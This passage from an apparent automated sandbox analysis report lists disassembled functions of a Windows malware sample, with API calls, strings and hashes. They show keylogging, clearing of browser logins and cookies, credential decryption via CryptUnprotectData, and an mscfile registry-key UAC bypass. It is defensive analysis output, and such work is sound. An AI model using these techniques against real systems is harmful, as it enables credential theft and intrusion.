                        • Opcode ID: 5dfc5c04e88bff774400eef92f9a188e96d7e5ade9dca766e11bbcc0c0b71fd5
                        • Instruction ID: d7c010aeaec7a8a897f36992f2f7f2874d2ac4fe7d304ea8792e53e8e447d7e7
                        • Opcode Fuzzy Hash: 5dfc5c04e88bff774400eef92f9a188e96d7e5ade9dca766e11bbcc0c0b71fd5
                        • Instruction Fuzzy Hash: 9C51C371E002099FEF14DFA9C881AAEB7B5EF48314F24816EE954E7301E779DE018B94
                        Function 00442B2D Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: __alloca_probe_16__freea
                        • String ID: H"G$H"GH"G
                        • API String ID: 1635606685-3036711414
                        • Opcode ID: 80076ff913fd6fdf96b59eec9a2e877d4b1c448352c335ccfb263d7e6081886f
                        • Instruction ID: 3c870ea2fb57449e7c992ce38f4d69c2eab2d9a05dd359c3c94aeedaa7d51697
                        • Opcode Fuzzy Hash: 80076ff913fd6fdf96b59eec9a2e877d4b1c448352c335ccfb263d7e6081886f
                        • Instruction Fuzzy Hash: F0411931A00212ABEB219F65CD82A5FB7A1EF45714F54056FF804DB291EBBCDD40879E
                        Function 0040184A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 142threadCOMMON
                        Download Yara Rule
                        APIs
                        • __Init_thread_footer.LIBCMT ref: 0040189E
                        • ExitThread.KERNEL32 ref: 004018D6
                        • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00471E78,00000000), ref: 004019E4
                          • Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                        • String ID: 8:G
                        • API String ID: 1649129571-405301104
                        • Opcode ID: d11932d744bb97d4d23e75232cb79a590d4ec77f01a60ef524a2726dec1169f8
                        • Instruction ID: 6b8457e9d7ea4966c0dd8dde8758560e0d74fde28bba72e74fe0511dc6260a90
                        • Opcode Fuzzy Hash: d11932d744bb97d4d23e75232cb79a590d4ec77f01a60ef524a2726dec1169f8
                        • Instruction Fuzzy Hash: 7941E7325042005BC324FB65DD86EAFB3A9AB84318F40453FF589621F2DF78994ADB5E
                        Function 00440935 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                        Download Yara Rule
                        APIs
                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe,00000104), ref: 00440975
                        • _free.LIBCMT ref: 00440A40
                        • _free.LIBCMT ref: 00440A4A
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: _free$FileModuleName
                        • String ID: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe
                        • API String ID: 2506810119-415676320
                        • Opcode ID: 85438adf96173c680659750e247b8861d1a9ea07739a925f85de7b4b5d9254a8
                        • Instruction ID: d1e15b597fe779666310b40bee8bd10d15f5dfa451d6ac01ff045fbeec250af7
                        • Opcode Fuzzy Hash: 85438adf96173c680659750e247b8861d1a9ea07739a925f85de7b4b5d9254a8
                        • Instruction Fuzzy Hash: CA31C4B1A00318AFEB21DF99D88199EBBF8EF84314F10406BF544A7311E6B48E55CB59
                        Function 00419675 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 90COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00412006: RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,00472248,00471FFC), ref: 00412030
                          • Part of subcall function 00412006: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 0041204B
                          • Part of subcall function 00412006: RegCloseKey.ADVAPI32(00000000), ref: 00412054
                          • Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,0040C663,WinDir,00000000,00000000), ref: 00419F34
                        • _wcslen.LIBCMT ref: 00419744
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                        • String ID: .exe$program files (x86)\$program files\
                        • API String ID: 37874593-1203593143
                        • Opcode ID: 546b0d98d04e059566fa11c86a24e7130a7516f31b9ccb35c8e0da8d0391a80d
                        • Instruction ID: a7f24a5d9d5c0dc772ada330bc3383911e5a1e9af4e42701afe0c0cb79e45fb3
                        • Opcode Fuzzy Hash: 546b0d98d04e059566fa11c86a24e7130a7516f31b9ccb35c8e0da8d0391a80d
                        • Instruction Fuzzy Hash: CB21B872A001046BDF14BAB6DD968FE37AD9E4831CB04057FF405B32D2ED7D8D5942A9
                        Function 00409203 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                        Download Yara Rule
                        APIs
                        • CreateThread.KERNEL32(00000000,00000000,00409305,00472008,00000000,00000000), ref: 0040928B
                        • CreateThread.KERNEL32(00000000,00000000,004092EF,00472008,00000000,00000000), ref: 0040929B
                        • CreateThread.KERNEL32(00000000,00000000,00409311,00472008,00000000,00000000), ref: 004092A7
                          • Part of subcall function 0040A0B0: GetLocalTime.KERNEL32(?,Offline Keylogger Started,00472008), ref: 0040A0BE
                          • Part of subcall function 0040A0B0: wsprintfW.USER32 ref: 0040A13F
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateThread$LocalTimewsprintf
                        • String ID: Offline Keylogger Started
                        • API String ID: 465354869-4114347211
                        • Opcode ID: fcb156bf474100ecd8714675bcdacda6a6d505e445d23128ee173ce543fa6834
                        • Instruction ID: c8e77f7b3f84bd49b91c3d3ae4e8ac846fef78eef7351f53fb2416b9cb49ddb0
                        • Opcode Fuzzy Hash: fcb156bf474100ecd8714675bcdacda6a6d505e445d23128ee173ce543fa6834
                        • Instruction Fuzzy Hash: 3211A7A15003083ED210BB669DD6CBB7A5CDA8139CB40057FF845221C3EAB85D19C6FF
                        Function 00409E37 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65threadCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0040A0B0: GetLocalTime.KERNEL32(?,Offline Keylogger Started,00472008), ref: 0040A0BE
                          • Part of subcall function 0040A0B0: wsprintfW.USER32 ref: 0040A13F
                          • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                        • CreateThread.KERNEL32(00000000,00000000,004092EF,?,00000000,00000000), ref: 00409EB7
                        • CreateThread.KERNEL32(00000000,00000000,00409311,?,00000000,00000000), ref: 00409EC3
                        • CreateThread.KERNEL32(00000000,00000000,0040931D,?,00000000,00000000), ref: 00409ECF
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateThread$LocalTime$wsprintf
                        • String ID: Online Keylogger Started
                        • API String ID: 112202259-1258561607
                        • Opcode ID: 3095bb4c8629fd0e670b035ea9b5ccaf12231fc020c32c5bedba700ceaefce21
                        • Instruction ID: 28bbfba120e67fe9302c314101e9d6be38f8a9d2e5fa49f3fb55d6307d966583
                        • Opcode Fuzzy Hash: 3095bb4c8629fd0e670b035ea9b5ccaf12231fc020c32c5bedba700ceaefce21
                        • Instruction Fuzzy Hash: 7F01C4A0A042083AE62076768CD6DBF7A6CCA92398B40047FFA45221C3D9B85C5586FE
                        Function 00404F31 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58timethreadCOMMON
                        Download Yara Rule
                        APIs
                        • GetLocalTime.KERNEL32(?), ref: 00404F61
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404FAD
                        • CreateThread.KERNEL32(00000000,00000000,00405130,?,00000000,00000000), ref: 00404FC0
                        Strings
                        • Connection KeepAlive | Enabled | Timeout: , xrefs: 00404F74
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Create$EventLocalThreadTime
                        • String ID: Connection KeepAlive | Enabled | Timeout:
                        • API String ID: 2532271599-507513762
                        • Opcode ID: ecde6dd8490a4419ba9d8f450afdef6f270760df43025f419a01a865904151c8
                        • Instruction ID: 3880ceca910d84d0b9b3d3001f949c19a9d90d4f91ad2e0c59d2668d569340f7
                        • Opcode Fuzzy Hash: ecde6dd8490a4419ba9d8f450afdef6f270760df43025f419a01a865904151c8
                        • Instruction Fuzzy Hash: 4F1127719002806AC720BB769C0DE9B7FA89BD2714F44056FF44123281D6B89445CBBA
                        Function 00406071 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData,?,00000000,00406039,?), ref: 00406090
                        • GetProcAddress.KERNEL32(00000000), ref: 00406097
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: CryptUnprotectData$crypt32
                        • API String ID: 2574300362-2380590389
                        • Opcode ID: f0fa7d81e448b8e45dda707d186e5b4dbadcbde3f04206e46648964c8c5bf07c
                        • Instruction ID: 6e7317174224a8efb10ab03f2076fe60a9434866ae70ffeafd7cb5b8c28562e1
                        • Opcode Fuzzy Hash: f0fa7d81e448b8e45dda707d186e5b4dbadcbde3f04206e46648964c8c5bf07c
                        • Instruction Fuzzy Hash: C801F535A04205ABCF18CFA9D8049ABBBB8AB54300F00427FE956E3380D635D904C794
                        Function 0040513C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON
                        Download Yara Rule
                        APIs
                        • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405139), ref: 00405153
                        • CloseHandle.KERNEL32(?), ref: 004051AA
                        • SetEvent.KERNEL32(?), ref: 004051B9
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseEventHandleObjectSingleWait
                        • String ID: Connection Timeout
                        • API String ID: 2055531096-499159329
                        • Opcode ID: 69bf4708d5eac36444cb13c7d4d8205934b4ecb8f60f6f16827c1b7745a6238b
                        • Instruction ID: 59ae86e236e2a5bc5991cc3fd82f69d26eb1b9a4ba12329ef82c58e56ff8d0a2
                        • Opcode Fuzzy Hash: 69bf4708d5eac36444cb13c7d4d8205934b4ecb8f60f6f16827c1b7745a6238b
                        • Instruction Fuzzy Hash: F901F531A40F40AFE711BB368C4551B7BD4FF01302704097FE19356AA1D6B89800CF49
                        Function 0040D1F0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                        Download Yara Rule
                        APIs
                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040D25E
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Exception@8Throw
                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                        • API String ID: 2005118841-1866435925
                        • Opcode ID: 07dcd5cdd291a6416836d0c86817599069bcc3367b78dc6d1ec70403740c8f80
                        • Instruction ID: 5123bbd1fc4d669f1c4d6c1cc045f4f856aea5ad0ec182f95f4946492138bf11
                        • Opcode Fuzzy Hash: 07dcd5cdd291a6416836d0c86817599069bcc3367b78dc6d1ec70403740c8f80
                        • Instruction Fuzzy Hash: 0401A261E44208BAD714EAD1C853FBA73689B64705F10806FB911751C2EA7DAA4E862F
                        Function 004120E8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42registryCOMMON
                        Download Yara Rule
                        APIs
                        • RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 00412104
                        • RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 0041211D
                        • RegCloseKey.ADVAPI32(00000000), ref: 00412128
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseOpenQueryValue
                        • String ID: origmsc
                        • API String ID: 3677997916-68016026
                        • Opcode ID: d40fef656c83bcaf339f4d5c80b35c3f5e3dd6ef5f24df27a21155112b999244
                        • Instruction ID: 61f3e32b1c93232b19bf4a4cc48abe95026028d342b1827e6ec6edb2467bbf34
                        • Opcode Fuzzy Hash: d40fef656c83bcaf339f4d5c80b35c3f5e3dd6ef5f24df27a21155112b999244
                        • Instruction Fuzzy Hash: 4C014B31800229BBCF219F91DC49DEB7F29EF05761F0141A5BE08A2161D63589BADBA4
                        Function 00414839 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                        Download Yara Rule
                        APIs
                        • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041487B
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExecuteShell
                        • String ID: /C $cmd.exe$open
                        • API String ID: 587946157-3896048727
                        • Opcode ID: e8ae4e63c9dc0d6232b12cfcea10d76e3d0f37ee2c59ec5f687c9fc8ea61ff61
                        • Instruction ID: 0094db9d050c86e8b7efcb7c1e993d1de0046a6f7675c6b5aa1ef49a358ded74
                        • Opcode Fuzzy Hash: e8ae4e63c9dc0d6232b12cfcea10d76e3d0f37ee2c59ec5f687c9fc8ea61ff61
                        • Instruction Fuzzy Hash: 8FF017712083049BC304FBB5DC91DEFB39CAB90348F50493FB556921E2EE789949C65A
                        Function 00412006 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40registryCOMMON
                        Download Yara Rule
                        APIs
                        • RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,00472248,00471FFC), ref: 00412030
                        • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 0041204B
                        • RegCloseKey.ADVAPI32(00000000), ref: 00412054
                        Strings
                        • http\shell\open\command, xrefs: 00412026
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseOpenQueryValue
                        • String ID: http\shell\open\command
                        • API String ID: 3677997916-1487954565
                        • Opcode ID: b2b53b33f668fea9d6b70683008644784a8f2d8740eef6bc6becda6435671858
                        • Instruction ID: 0e37d8025f140bc42ec1a8b72352379eb981339daaa9ecb07b48012be1c394e8
                        • Opcode Fuzzy Hash: b2b53b33f668fea9d6b70683008644784a8f2d8740eef6bc6becda6435671858
                        • Instruction Fuzzy Hash: C5F0C271500218FBDB609B95DC49EDFBBBCEB84B12F1040A6BA04E2150DAB55F98C7A5
                        Function 00412204 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39registryCOMMON
                        Download Yara Rule
                        APIs
                        • RegCreateKeyW.ADVAPI32(80000001,Software\Classes\mscfile\shell\open\command,0046FB08), ref: 0041220F
                        • RegSetValueExW.ADVAPI32(0046FB08,00469654,00000000,00000000,00000000,00000000,00469654,?,80000001,?,0040674F,00469654,0046FB08), ref: 0041223E
                        • RegCloseKey.ADVAPI32(0046FB08,?,80000001,?,0040674F,00469654,0046FB08), ref: 00412249
                        Strings
                        • Software\Classes\mscfile\shell\open\command, xrefs: 0041220D
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseCreateValue
                        • String ID: Software\Classes\mscfile\shell\open\command
                        • API String ID: 1818849710-505396733
                        • Opcode ID: 3e3fd8a80b9e4d87c81bb3c401438d747e56ec0492b29cf55bc65580399ff691
                        • Instruction ID: 05e6d75f170e8ecdfe9b8062019ada1801530107581382ed9d20477649f1572c
                        • Opcode Fuzzy Hash: 3e3fd8a80b9e4d87c81bb3c401438d747e56ec0492b29cf55bc65580399ff691
                        • Instruction Fuzzy Hash: A1F0AF71440218BBCF00DFA1ED45AEE376CEF44755F00816ABC05A61A1E63A9E14DA94
                        Function 0040C9CE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                        Download Yara Rule
                        APIs
                        • std::_Lockit::_Lockit.LIBCPMT ref: 0040C9D9
                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CA18
                          • Part of subcall function 004333ED: _Yarn.LIBCPMT ref: 0043340C
                          • Part of subcall function 004333ED: _Yarn.LIBCPMT ref: 00433430
                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CA3E
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                        • String ID: bad locale name
                        • API String ID: 3628047217-1405518554
                        • Opcode ID: 082478905eeced14d5731d6393d842c9ba169a160db0ba1d03fb3bfa15736ecf
                        • Instruction ID: 2c4ad0125759e8972babdbfe9bad97e9a7b68ba46d49635da0f31685b809246c
                        • Opcode Fuzzy Hash: 082478905eeced14d5731d6393d842c9ba169a160db0ba1d03fb3bfa15736ecf
                        • Instruction Fuzzy Hash: 6EF01232500604FAC328FBA6DC5299A77A49F14719F508D3FF545214D1FF396A18C699
                        Function 00412268 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30registryCOMMON
                        Download Yara Rule
                        APIs
                        • RegCreateKeyA.ADVAPI32(80000001,00000000,P0F), ref: 00412276
                        • RegSetValueExA.ADVAPI32(P0F,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 00412291
                        • RegCloseKey.ADVAPI32(?,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 0041229C
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseCreateValue
                        • String ID: P0F
                        • API String ID: 1818849710-3540264436
                        • Opcode ID: 621f54e733439cbcd958662464d090e9ff9f63f5a417d09ab0c58a6b3b1f16b4
                        • Instruction ID: aa9041bc7d36289a95917c0f975a521a353b8518001b5fa9068edf17b8c75ad2
                        • Opcode Fuzzy Hash: 621f54e733439cbcd958662464d090e9ff9f63f5a417d09ab0c58a6b3b1f16b4
                        • Instruction Fuzzy Hash: 05E03972600308BBDB209FA09D05FEA7B6CEF04B62F1141A5BF09A6591D2758E14A7A8
                        Function 004013F2 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 004013FC
                        • GetProcAddress.KERNEL32(00000000), ref: 00401403
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressHandleModuleProc
                        • String ID: GetCursorInfo$User32.dll
                        • API String ID: 1646373207-2714051624
                        • Opcode ID: 088d9d047025d8497e924925820d5eb65f0f262b7c85d6662a4774416c360c30
                        • Instruction ID: b28a71f0ab0cd05a0e9183a6667f806437ada0decc35e30242c3667109896680
                        • Opcode Fuzzy Hash: 088d9d047025d8497e924925820d5eb65f0f262b7c85d6662a4774416c360c30
                        • Instruction Fuzzy Hash: 8BB09BB5741301BB8A017B705E0D905357C550470375102A3B00386161F7F44500C61E
                        Function 00401497 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014A1
                        • GetProcAddress.KERNEL32(00000000), ref: 004014A8
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: GetLastInputInfo$User32.dll
                        • API String ID: 2574300362-1519888992
                        • Opcode ID: 0a32acb6837364cc41bfb1711514e79ed8798cba9f1c44e4cca123ab277e4417
                        • Instruction ID: 9c97512ccc3e9dae7fbe55962af9901819d65f6a69b3e33b2a0b565c767961ff
                        • Opcode Fuzzy Hash: 0a32acb6837364cc41bfb1711514e79ed8798cba9f1c44e4cca123ab277e4417
                        • Instruction Fuzzy Hash: 51B092B1980302AB8E006FB1AE0DE043AB8A604703B5102B6B00292161EAF99440CF2E
                        Function 00448C13 Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: __alldvrm$_strrchr
                        • String ID:
                        • API String ID: 1036877536-0
                        • Opcode ID: ffe43cf3e465c727d5e0953a870d72e00f4610d42b915cf7dfa75284df7637f7
                        • Instruction ID: 8a3f88530d83194aa24a517e4ef6e15a272d99a70002873db7a8ab856bdac54d
                        • Opcode Fuzzy Hash: ffe43cf3e465c727d5e0953a870d72e00f4610d42b915cf7dfa75284df7637f7
                        • Instruction Fuzzy Hash: 18A12572A012869FFB21CE18C8817AEBBA1EF65314F24416FE5859B382CA3C8941C759
                        Function 0043FD01 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 708417122de2711bb2eb7b93dd9c5bc77eababb27f74811c5393ad6cf28abd82
                        • Instruction ID: c1abd53b49e6a7723cad7358b49d7c046164203d86e3a19123cc85c40c5f12b7
                        • Opcode Fuzzy Hash: 708417122de2711bb2eb7b93dd9c5bc77eababb27f74811c5393ad6cf28abd82
                        • Instruction Fuzzy Hash: 93412871E00704AFD7249F79CC46B5A7BA9EB8C714F10523FF142DB681D37999498788
                        Function 00404CA3 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON
                        Download Yara Rule
                        APIs
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00471EE8), ref: 00404D93
                        • CreateThread.KERNEL32(00000000,00000000,?,00471E90,00000000,00000000), ref: 00404DA7
                        • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 00404DB2
                        • CloseHandle.KERNEL32(?,?,00000000), ref: 00404DBB
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Create$CloseEventHandleObjectSingleThreadWait
                        • String ID:
                        • API String ID: 3360349984-0
                        • Opcode ID: 4507b0ab51a6c89f5a00a7e6d16978d5bd04c0451300ea21d68f1003f035869f
                        • Instruction ID: 0d5bef4af40d9751d8a4c840d6feadb85822b330c50e1cee3accc81e25362d00
                        • Opcode Fuzzy Hash: 4507b0ab51a6c89f5a00a7e6d16978d5bd04c0451300ea21d68f1003f035869f
                        • Instruction Fuzzy Hash: DA4194712083016FCB11FB61CD55D6FB7EDAFD4314F400A3EB982A32E2DB7899098666
                        Function 0040AF4D Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        • Cleared browsers logins and cookies., xrefs: 0040B036
                        • [Cleared browsers logins and cookies.], xrefs: 0040B025
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Sleep
                        • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                        • API String ID: 3472027048-1236744412
                        • Opcode ID: c5625c41e3350cd44f31e3f39ca14d3df05c6bc0ef5032128f41299be6cd647b
                        • Instruction ID: 9e673e540e653d5dfc9c41bfd33b173fe745421aa21f598ea7623546fa890e2b
                        • Opcode Fuzzy Hash: c5625c41e3350cd44f31e3f39ca14d3df05c6bc0ef5032128f41299be6cd647b
                        • Instruction Fuzzy Hash: EE31A24074C3826EDA11BBB555267EF6B924A53758F0844BFF8C42B3C3D9BA4818936F
                        Function 00411140 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 93sleepCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 004120E8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 00412104
                          • Part of subcall function 004120E8: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 0041211D
                          • Part of subcall function 004120E8: RegCloseKey.ADVAPI32(00000000), ref: 00412128
                        • Sleep.KERNEL32(00000BB8), ref: 004111DF
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseOpenQuerySleepValue
                        • String ID: H"G$exepath$!G
                        • API String ID: 4119054056-2148977334
                        • Opcode ID: b63ef4792b0a54595826799ca09291a4a0f263f6c30614dda09e5540f09a92a9
                        • Instruction ID: cc1704131a0fe244d5c58522e2247ad29464f3afd50ace533094a5add093a815
                        • Opcode Fuzzy Hash: b63ef4792b0a54595826799ca09291a4a0f263f6c30614dda09e5540f09a92a9
